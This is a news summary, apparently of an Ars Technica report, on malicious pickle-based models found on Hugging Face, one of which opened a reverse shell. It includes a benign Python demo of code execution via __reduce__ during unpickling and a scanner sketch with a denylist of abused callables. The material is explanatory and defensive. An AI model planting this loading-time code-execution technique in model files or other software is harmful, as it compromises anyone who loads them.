Hugging Face, the GitHub of AI, hosted code that backdoored user devices

Mar 02, 2024 - arstechnica.com
Researchers from security firm JFrog have discovered that code uploaded to AI developer platform Hugging Face covertly installed backdoors and other types of malware on end-user machines. They found roughly 100 submissions that performed hidden and unwanted actions when downloaded and loaded onto an end-user device. Most of these machine learning models appeared to be benign proofs of concept uploaded by researchers or curious users and had gone undetected by Hugging Face. However, 10 of them were found to be "truly malicious," compromising users' security when loaded.

One model was of particular concern because it opened a reverse shell that gave a remote device on the internet full control of the end user's machine. This model was submitted by a user named baller432 and evaded Hugging Face's malware scanner by using pickle's "__reduce__" method to execute arbitrary code when the model file is loaded. This kind of silent infiltration could grant access to critical internal systems and pave the way for large-scale data breaches or even corporate espionage. Hugging Face has since removed the model and the others flagged by JFrog.
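
The mechanism JFrog describes relies on a standard Python feature: when pickle reconstructs an object, it calls whatever callable that object's __reduce__ method returned during serialization. Below is a minimal, benign sketch of that general technique; the class name and the harmless echo command are illustrative assumptions, not the actual payload carried by the flagged model.

```python
import os
import pickle


class MaliciousPayload:
    """Benign stand-in for the technique described in the article:
    __reduce__ tells pickle how to 'reconstruct' this object, and pickle
    will invoke the returned callable the moment the file is loaded."""

    def __reduce__(self):
        # A real attacker would open a reverse shell here; this sketch only
        # echoes a message so the effect is visible and harmless.
        return (os.system, ('echo "code executed during unpickling"',))


# Serializing the object produces bytes that look like an ordinary pickle.
payload_bytes = pickle.dumps(MaliciousPayload())

# Simply loading the data runs the embedded command -- no method call needed.
pickle.loads(payload_bytes)
```

Because the payload fires inside the deserialization step itself, a model file like this compromises the machine as soon as it is loaded, before any inference code runs.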

Key takeaways:

  • Malicious code was covertly installed on end-user machines through the AI developer platform Hugging Face, according to a report by security firm JFrog.
  • Out of roughly 100 submissions that performed hidden and unwanted actions, 10 were found to be 'truly malicious', compromising users' security when loaded.
  • One model opened a reverse shell, giving a remote device full control of the end user's device, which would be a major breach of researcher ethics even if it had been uploaded as research.
  • The malicious models used pickle, a serialization format long recognized as inherently risky, to sneak in malicious code. The model that spawned the reverse shell was submitted by a user named baller432 and was able to evade Hugging Face's malware scanner (see the scanning sketch after this list).
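
For context on why pickle files are hard to vet, here is a rough sketch of the opcode-level inspection approach that pickle scanners generally take: it walks the pickle stream with Python's standard pickletools module without executing anything and flags imports of callables commonly abused in payloads. The denylist and helper name are illustrative assumptions, not Hugging Face's actual scanner, which the flagged model evidently managed to slip past.

```python
import io
import pickletools

# Callables commonly abused in pickle payloads. This denylist is an
# illustrative assumption, not the list any real scanner actually uses.
SUSPICIOUS = {
    ("os", "system"),
    ("posix", "system"),
    ("subprocess", "Popen"),
    ("builtins", "eval"),
    ("builtins", "exec"),
}


def flag_suspicious_imports(pickle_bytes: bytes) -> list[str]:
    """Walk the pickle opcode stream without executing it and report any
    imports of denylisted callables (hypothetical helper for illustration)."""
    findings = []
    recent_strings = []  # string constants that may feed a STACK_GLOBAL import
    for opcode, arg, _pos in pickletools.genops(io.BytesIO(pickle_bytes)):
        if opcode.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            recent_strings.append(arg)
        elif opcode.name == "GLOBAL":
            # Protocols <= 3: module and name arrive as one space-separated arg.
            module, name = arg.split(" ", 1)
            if (module, name) in SUSPICIOUS:
                findings.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            # Protocols >= 4: module and name were pushed as strings just before.
            module, name = recent_strings[-2], recent_strings[-1]
            if (module, name) in SUSPICIOUS:
                findings.append(f"{module}.{name}")
    return findings


# The payload from the earlier sketch would be reported as ["os.system"].
```

Static inspection like this is only a heuristic: attackers can indirect through less obvious callables or obfuscate the import path, which is why pickle-based model files remain risky to load from untrusted sources.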